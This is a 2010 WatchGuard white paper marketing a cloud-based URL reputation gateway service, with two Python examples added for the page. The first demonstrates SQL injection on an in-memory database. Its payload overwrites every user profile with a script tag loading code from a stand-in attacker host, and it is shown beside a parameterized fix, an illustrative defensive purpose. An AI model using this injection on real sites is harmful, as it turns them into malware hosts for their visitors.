WatchGuard Technologies is promoting its cloud-based web security solution called Reputation Enabled Defense. This solution uses reputation scoring from a large database to determine if URLs are safe to access, allowing safe URLs to bypass antivirus scanning for faster page loading. It provides an extra layer of protection against evolving web threats in real-time without sacrificing performance. The benefits include improved security against malware, better performance through reduced scanning, and a more proactive approach to fighting threats.
Document Presented By Wick Hill and DNA IT
River Court,
Albert Drive,
Woking, Surrey
GU21 5RP
01483 227600
info@wickhill.co.uk
www.wickhill.com/watchguard
Unit J 2,
Maynooth Business Campus,
Maynooth,
Co.Kildare
+353 1 651 0300
sales@dnait.ie
www.dnait.ie
Cloud-based Web Security Isn’t Hype:
It’s Here and It Works
June 2010
INTRODUCTION
It’s not news that the web is dangerous and getting more dangerous by the day. Cyber criminals have
ample economic motive and easy-to-use tools to harness the power of the web in capturing and misusing
your data.
What is news is that now you can protect your company’s valuable assets from web-based attacks with
an innovative, effective new form of web security – cloud-based, reputation-driven defense.
Web Threats are on the Rise
The web is experiencing phenomenal growth, and with it, an unprecedented increase in the amount of
new malware types that target web browsers, applications, and Web 2.0 infrastructure. Because
cybercriminals can reap large profits from attacks that result in identity and data theft, a growing number
of organized crime rings continuously fund new attempts to spread malware and acquire web users’
personal data. Through modified packing and encrypting techniques, and other obfuscation methods,
attackers can now create thousands of new variants of the same threat with relatively little effort. Despite
these threats, most organizations continue to leverage new web-based applications to drive revenue and
efficiencies, particularly as Web 2.0 technologies deliver new ways to interact and engage with customers
and stakeholders.
Organizations frequently underestimate their exposure to malicious attacks. The statistics can be
sobering. In 2009 alone, there was a dramatic 345% increase in the number of new malicious web links
discovered.[1] These included high-profile sites, including those run by MSNBC, ZDNet, The United Nations,
and Honda.[2] According to IDC, up to 30% of companies with 500 or more staff have been infected as a
result of Internet surfing.[3] In other words, anywhere web users interact, malware encounters are
frequent and common. To fend off new forms of malware – including spyware, viruses, crimeware and
other malicious code – organizations must better safeguard their web security infrastructure. A reactive
and fixed security infrastructure must be turned into one that is proactive and adaptable to changes in the
threat landscape.

[1] IBM X-Force 2009 Trend and Risk Report

WatchGuard Technologies www.watchguard.com
There are many ways that legitimate websites can become infected. One inbound threat that has
recently gained popularity among cybercriminals is SQL injection. Attackers use SQL injection to gain
access to database-driven websites and plant malicious code that is then served to site visitors. This can
be combined with Web 2.0-based social engineering attacks in which users believe they are being pointed
to legitimate content. Compromised sites may host drive-by downloads, where the page exploits
vulnerabilities on the users’ systems to install malware without any user interaction. Common applications
such as Apple QuickTime® and Adobe PDF® software may be exploited. Thus, an organization’s own
application vulnerabilities and web site code flaws open the door to cybercriminals seeking to infiltrate
the organization.
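To make the SQL injection scenario above concrete, here is an added Python example written for this page (it is not from the WatchGuard paper). It shows an injectable profile update on a database-driven site that lets a single submitted value overwrite every user’s visitor-facing bio with a script tag, next to the parameterized statement that prevents it. The table, rows, payload and the attacker.example host are constructed for the illustration, and sqlite3 stands in for the site’s database.

```python
"""Added example: SQL injection used to plant attacker script into a site's pages.

Constructed for illustration; the table, rows, payload and the attacker.example
host are made up, and sqlite3 stands in for the site's database.
"""
import html
import sqlite3

# Constructed payload. Submitted as a "display name", it closes the quoted value,
# appends a second SET clause that overwrites every row's bio, and comments out
# the original WHERE clause so the statement is no longer limited to one user.
PAYLOAD_NAME = (
    "x', bio = '<script src=\"https://attacker.example/m.js\"></script>' "
    "WHERE 1=1 --"
)


def fresh_db():
    """In-memory stand-in for the site's user table, seeded with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, display_name TEXT, bio TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "Editor."), (2, "bob", "Reader."), (3, "carol", "Admin.")],
    )
    conn.commit()
    return conn


def update_name_vulnerable(conn, user_id, name):
    """Vulnerable: the user-supplied name is pasted into the SQL text.
    The id is cast to int, so the injection point is the name alone."""
    conn.execute(
        f"UPDATE users SET display_name = '{name}' WHERE id = {int(user_id)}"
    )
    conn.commit()


def update_name_safe(conn, user_id, name):
    """Hardened: the value travels as a bound parameter, never as SQL text."""
    conn.execute(
        "UPDATE users SET display_name = ? WHERE id = ?", (name, int(user_id))
    )
    conn.commit()


def rows_with_script(conn):
    """IDs of users whose stored bio now carries a <script> tag."""
    rows = conn.execute(
        "SELECT id FROM users WHERE bio LIKE '%<script%' ORDER BY id"
    )
    return [row[0] for row in rows]


def profile_html(conn, user_id):
    """What a visitor sees. Escaping on output is a second, independent defence:
    even a poisoned bio renders as inert text instead of executing."""
    name, bio = conn.execute(
        "SELECT display_name, bio FROM users WHERE id = ?", (user_id,)
    ).fetchone()
    return f"<h1>{html.escape(name)}</h1><p>{html.escape(bio)}</p>"


if __name__ == "__main__":
    db = fresh_db()
    update_name_vulnerable(db, 2, PAYLOAD_NAME)
    print("vulnerable: rows carrying <script>:", rows_with_script(db))

    db = fresh_db()
    update_name_safe(db, 2, PAYLOAD_NAME)
    print("safe: rows carrying <script>:", rows_with_script(db))
```

With the vulnerable handler, one request from one low-privilege account rewrites every profile on the site; every subsequent visitor then loads the attacker’s script, which is exactly the “legitimate site turned malware host” pattern the text describes. Parameterization keeps the payload as an odd-looking display name on a single row.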
THE NEED TO BALANCE SECURITY AND PERFORMANCE
Many IT security professionals face conflicting demands from management and network users when it
comes to web security. The need for speed is always in demand, but delivering that speed while
enhancing security for a broader, more dynamic threat environment is quite challenging. Following are
some of the most frequent obstacles to achieving this goal:
• A lack of additional IT budget to shore up network security
• Network constraints that conflict with security issues around cloud computing
• Performance degradations across the network due to additional hosted services
The options for overcoming these obstacles to proactive, multi-layered security are either unappealing or
insufficient. For example, one defense against the widespread proliferation of malware is to install anti-
virus scanning at the gateway, capturing malware before it ever enters the network. But scanning every
page and object at the URL can slow down web page delivery and affect both throughput at the device
and the user experience at the browser. Some network administrators may be reluctant to use gateway
anti-virus because of its performance impact.
Finally, desktop or browser-based scanning solutions only catch threats once they are in the network. By
the time these solutions alert users, today’s malware could have already inflicted great amounts of
damage to the organization’s computing infrastructure and/or compromised sensitive data from within
the organization.
URL Filtering is Not Enough
Since the 1990s, reputation services have been helping organizations block unwanted or bad traffic to
ensure that threats never enter the network. By identifying and blocking threats at the perimeter,
reputation services help prevent attacks, reduce the on-premise IT footprint required to scan traffic, and
lower the costs associated with the bandwidth, hardware, and other resources required to block threats.
As web technologies and the web itself have grown more sophisticated, early-generation reputation
services have become less effective in identifying and blocking threats. To fully understand this loss of
effectiveness, it helps to look at how these services have evolved.

[2] Gartner IT Security Conference 2009, Securing the Web Gateway, Peter Firstbrook
[3] Journal of Emerging Technologies in Web Intelligence, Vol. 2, No. 2, May 2010, Protecting Data from the Cyber Theft – A Virulent Disease
On the dynamic web, sites are continuously updated with new content, while URLs are frequently sold
and altered. So a site that is scanned and categorized as legitimate by URL filters today may become a
malware hub at some later point in time. In order to properly filter out hazardous and dangerous
websites, a filter cannot merely rely on a static database. According to a report by IDC, “The advances in
Web 2.0 technologies require a new generation of web security tools that go well beyond traditional URL
filtering.”[4] Such a filter must be as dynamic as the web itself, providing real-time threat protection. In
addition, it must scale to handle the vast growth of the Internet.
Effective Security is Proactive and Multi-Layered
The most effective approach for defending against the web’s dynamic threats is a proactive, multi-layered
approach to web security. Being proactive requires that the security solution reach into the Internet cloud,
obtain the latest threat data from multiple threat-monitoring sources, and prepare a network’s perimeter in
the event that one of the threats presents itself to the network. Effective defense is multi-layered, applying
additional measures of threat scanning, depending on the type of content that attempts to enter the
network.

WatchGuard® Reputation Enabled Defense™ provides effective, instantaneous, in-depth web security in
real time. Based on the from-the-cloud security of WatchGuard ReputationAuthority®, Reputation Enabled
Defense leverages the cloud-based intelligence of millions of global sources and users, sharing information
about threats associated with URLs and domains in real-time to automatically block new threats before they
enter an organization’s network.

WatchGuard Reputation Enabled Defense includes real-time monitoring of web traffic, including scanning of
URLs, to determine the risk level of each and every web page before it enters the network. The solution
assesses each threat and type of network traffic. By scanning for hostile content and blocking malicious
URLs at the connection level, Reputation Enabled Defense bridges the web security gap left exposed by
simple URL filtering, provides safer web surfing and faster web performance.

Web Security Numbers
A look at some of the most recent figures related to web security demonstrates the need for IT security
professionals to proactively manage a broad array of ever-changing threat types.
• 40,000 websites per week were compromised during 2008-2009.[5]
• The Gumblar virus alone compromised 60,000 websites.[6]
• In 2009, 23,500 new web pages were infected per day.[7]
• 0.7% of Google Search results display sites that have been infected by malware.[8]
• The Mal/Bredo malware had 838 variants during the first quarter of 2010.[9]
[4] IDC, Worldwide Web Security 2009-2013 Forecast and 2008 Marketshares: It’s All About Web 2.0 You TwitFace, August 2009
[5] Google Online Security Blog, Malware Statistics Update, August 25, 2009
[6] Google Online Security Blog, Top 10 Malware Sites, June 3, 2009
[7] Sophos, Sophos Security Threat Report, July 2009
[8] Google Online Security Blog, Malware Statistics Update, August 25, 2009
[9] Commtouch, Well-known Web Names Misused to Give Spam Deceptive Legitimacy, According to New Report by Commtouch, April 14, 2010
WHAT TO LOOK FOR IN REPUTATION SERVICES
Reputation services complement gateway antivirus and traditional desktop solutions by providing
improved performance and an additional layer of protection. Unlike traditional gateway anti-virus
solutions, which typically update signatures on an hourly or daily basis, reputation services provide the
equivalent of real-time updates of malware intelligence. The broader and improved URL reputation data
they provide result in greater protection from web threats and faster, more productive web surfing.
However, not all reputation services function in the same manner, so IT security professionals should
exercise caution when evaluating potential solutions.
Many reputation services are implemented as plug-ins that prevent users from visiting web sites known
for malware or phishing. By contrast, WatchGuard has adopted a contributor approach to reputation
services to offer next-generation reputation services. WatchGuard’s reputation and connection
management approach reflects the belief that, to be truly effective and to proactively prevent
evolving threats, reputation services must be a true zero-hour first line of defense. They must not act
simply as a monitoring system that relies on static databases, as most reputation services on the market
do today. Rather, to achieve proactive, adaptive identification, the WatchGuard approach is to manage
web threats at the connection level and to perform in-depth analysis at the gateway layer. It then
contributes the findings from the gateway to the reputation service in real time, harnessing the
intelligence of millions of global users and sources for more powerful and intelligent protection from
malicious URLs and web threats.
WatchGuard Reputation Enabled Defense users can choose to bypass anti-virus and other scanning
functions for URLs that are known to have a current good reputation, saving time and helping to maintain
performance levels.
WatchGuard Reputation Enabled Defense
WatchGuard Reputation Enabled Defense is available on WatchGuard’s line of multi-function firewall,
unified threat management (XTM) appliances, as well as on its XCS extensible content security appliances
by adding a web security subscription. It provides a cloud-based reputation lookup to identify safe or
harmful URLs. Harnessing threat intelligence from millions of users worldwide, Reputation Enabled
Defense offers an extra layer of protection that acts as a powerful first line of defense from web threats.
By preempting threats before they enter the network, Reputation Enabled Defense helps reduce
computing overhead incurred by anti-virus scanning, particularly costly on-box scanning at the gateway,
and helps speed delivery of approved content. In essence, WatchGuard takes web security beyond the
box and network, managing as much as possible in the cloud.
How Reputation Enabled Defense works
As a cloud-assisted service, Reputation Enabled Defense provides instantaneous security that is updated
continuously. Not only does it improve proactive security, it helps organizations take advantage of greater
computing and processor power from servers hosted in the cloud. IT can save valuable processor
resources on local appliances. As a result, more users can be served at higher rates of throughput – for
less money.
Figure 1 below provides an overview of how Reputation Enabled Defense works to enhance web security.
The core of the service is its cloud-based reputation-scoring database – the industry’s most
comprehensive database – and an on-appliance query system.
[Figure 1 image not reproduced; its label reads “Give users a faster, safer web surfing experience”]
Figure 1: Reputation Enabled Defense uses a powerful, cloud-based database to allow safe traffic in while
keeping bad traffic out. Only unknown traffic is directed to further AV scanning, for substantial gains in
web processing time.
When a web user browses to a URL, the WatchGuard appliance checks a local cache for that URL’s
reputation scores. If the result is not found in the local cache, WatchGuard then queries its cloud-based
ReputationAuthority server for a reputation score for the URL. If the URL has a good reputation, the
appliance approves the URL and bypasses local anti-virus scanning, allowing for faster page rendering and
content delivery.
In the event that a URL is deemed to have a bad reputation (i.e., it contains hostile web threats), the
WatchGuard appliance blocks the URL outright, immediately protecting users from malicious content and
again bypassing local anti-virus scanning. If a URL’s score appears in the gray area between good and bad,
or if there is no score available, the appliance performs its routine defense-in-depth web security checks
and then passes or blocks the URL based on these checks.
WatchGuard recognizes that all organizations use the web differently, so Reputation Enabled Defense is
fully configurable. Because today’s threats can compromise a normally safe web site within seconds of its
last scan, administrators can choose not to use the feature that bypasses scanning of URLs with a good
reputation, accepting the scanning cost in exchange for not trusting a stale score.
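The lookup and decision sequence just described, as an added worked example written for this page (it is not WatchGuard code and does not reflect the product’s real score scale, thresholds or protocol). It models the local cache, the fall-back query to the cloud service, the three outcomes (good reputation: bypass AV; bad reputation: block at the connection level; gray area or no score: run the full defense-in-depth checks), the administrator’s option to disable the bypass, and a cache TTL so that a previously good score is re-checked rather than trusted forever, which addresses the concern above about sites being compromised after their last scan. The 0-100 score scale, both thresholds, the TTL and the lookup table are assumptions; a constructed dictionary stands in for the cloud reputation service.

```python
"""Added illustration of a reputation-gated web gateway (not WatchGuard code).

Assumptions made for the example: a 0-100 score where higher is worse, the two
thresholds below, a cache TTL, and a constructed dictionary in place of the
cloud reputation service.
"""
import time
from dataclasses import dataclass
from enum import Enum
from typing import Callable, Dict, Optional
from urllib.parse import urlsplit


class Verdict(Enum):
    ALLOW_BYPASS_AV = "good reputation: allow and skip gateway AV scanning"
    BLOCK = "bad reputation: block at the connection level"
    SCAN = "gray or unscored: run the full defence-in-depth checks"


BAD_THRESHOLD = 90    # assumed: at or above this the URL is treated as hostile
GOOD_THRESHOLD = 10   # assumed: at or below this the URL may skip AV scanning


@dataclass
class CacheEntry:
    score: Optional[int]   # None means the service had no score for this URL
    expires_at: float


class ReputationGateway:
    def __init__(self, cloud_lookup: Callable[[str], Optional[int]], *,
                 bypass_av_for_good: bool = True, cache_ttl: float = 300.0,
                 clock: Callable[[], float] = time.monotonic) -> None:
        self.cloud_lookup = cloud_lookup
        self.bypass_av_for_good = bypass_av_for_good  # the administrator's toggle
        self.cache_ttl = cache_ttl
        self.clock = clock
        self.cache: Dict[str, CacheEntry] = {}
        self.cloud_queries = 0

    @staticmethod
    def cache_key(url: str) -> str:
        """Host plus path; scheme, port, query string and fragment are ignored."""
        parts = urlsplit(url)
        return f"{parts.hostname or ''}{parts.path or '/'}"

    def score_for(self, url: str) -> Optional[int]:
        """Consult the local cache first; on a miss or expired entry, ask the cloud."""
        key = self.cache_key(url)
        now = self.clock()
        entry = self.cache.get(key)
        if entry is None or entry.expires_at <= now:
            score = self.cloud_lookup(key)
            self.cloud_queries += 1
            self.cache[key] = CacheEntry(score, now + self.cache_ttl)
            return score
        return entry.score

    def decide(self, url: str) -> Verdict:
        score = self.score_for(url)
        if score is None:
            return Verdict.SCAN
        if score >= BAD_THRESHOLD:
            return Verdict.BLOCK
        if score <= GOOD_THRESHOLD and self.bypass_av_for_good:
            return Verdict.ALLOW_BYPASS_AV
        return Verdict.SCAN   # gray area, or a good score with the bypass disabled


# Constructed stand-in for the cloud reputation database (host + path -> score).
CONSTRUCTED_SCORES: Dict[str, int] = {
    "news.example/": 3,                  # long-standing, consistently clean
    "downloads.example/setup.exe": 97,   # known malware distribution point
    "blog.example/post/42": 55,          # mixed history: gray area
    # "brand-new.example/" is deliberately absent: no score available yet
}


def constructed_cloud_lookup(key: str) -> Optional[int]:
    return CONSTRUCTED_SCORES.get(key)


class FakeClock:
    """Settable clock so cache expiry can be exercised without waiting."""
    def __init__(self) -> None:
        self.now = 0.0

    def __call__(self) -> float:
        return self.now


if __name__ == "__main__":
    gateway = ReputationGateway(constructed_cloud_lookup, clock=FakeClock())
    for url in ("http://news.example/", "http://downloads.example/setup.exe",
                "https://blog.example/post/42", "http://brand-new.example/"):
        print(f"{url:38} -> {gateway.decide(url).value}")
    print("cloud queries:", gateway.cloud_queries)
```

Two design points worth noting. The cache key drops scheme, port and query string, so repeat visits to the same page are served from the cache and only the first request pays a round trip to the cloud; the “no score” answer is cached as well, so an unknown site does not trigger a lookup on every request. The TTL and the `bypass_av_for_good` flag are the two knobs that trade performance against the risk that a good score has gone stale.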
A True Service that Pays for Itself
WatchGuard ensures that Reputation Enabled Defense is delivering the strongest possible security with
the lowest resource usage. WatchGuard manages the growth of the URL Reputation database via multiple
feeds and aggregated data. This is a continuous and ongoing process, performed by WatchGuard,
enabling customers to benefit from far greater intelligence and security than they have implemented in
their own environment.
Reputation Enabled Defense typically allows the bypass of antivirus scanning for 30-50% of URLs, with an
accompanying increase in web browsing speed and throughput at the multi-function firewall. With the
web’s top URLs always clearly rated and always in the reputation database, anti-virus scanning for these
URLs can be bypassed at very low risk. This maximizes performance without sacrificing security when
visiting these sites.
BENEFITS OF REPUTATION ENABLED DEFENSE
WatchGuard Reputation Enabled Defense provides a broad set of security and performance benefits
arising from the ability to perform proactive security measures in the cloud. Below are the most salient
benefits for IT and network administrators.
Security
• Organizations can protect their valuable data by increasing the efficacy and catch rate against every
URL-based type of malware.
• Administrators gain comfort in knowing that unsafe URLs face multiple levels of automated
protection prior to gaining network access.
• The full power and knowledge of the broad WatchGuard user community is brought to bear on the
network’s security stance through cloud-based security.
• Administrators can strike the ideal balance of security and performance by monitoring scan results
and modifying system configurations.
Performance
• Administrators can deliver higher performance to the business and raise user satisfaction levels by
minimizing URL scanning and gaining higher throughput at the gateway.
• Administrators can reduce bandwidth and processing cycles with connection-level rejections of bad
web sites.
• The most frequented URLs are regularly updated in the ReputationAuthority database because the
WatchGuard technology learns which URLs are popular.
Proactively Fight Malware
Malware continues to spread across the web. The ability of a single organization’s IT staff to monitor and
protect against all threats is eaten away by growing threat volumes and by new and ever-morphing threat
variations. That is why WatchGuard is constantly pushing the envelope to improve methods for proactive
and cloud-based security, taking into account the critical balance that must be maintained between
security and performance.
WatchGuard Reputation Enabled Defense enables organizations to proactively fight the threat of malware
without sacrificing user experience and network performance. In fact, WatchGuard is the only UTM/multi-
function firewall vendor with a URL reputation solution at the gateway.
WatchGuard customers with Reputation Enabled Defense protecting their networks benefit from multiple
outstanding anti-malware technologies that provide more coverage than systems that rely on just one
anti-malware source. And benefits of Reputation Enabled Defense extend to all participating customers,
because the cloud-based service dynamically protects them from newly discovered threats in real time.
By making the incremental investment in Reputation Enabled Defense, customers will gain exponential
levels of protection. Why wait? The cybercriminals are acting now. Get one step ahead of them.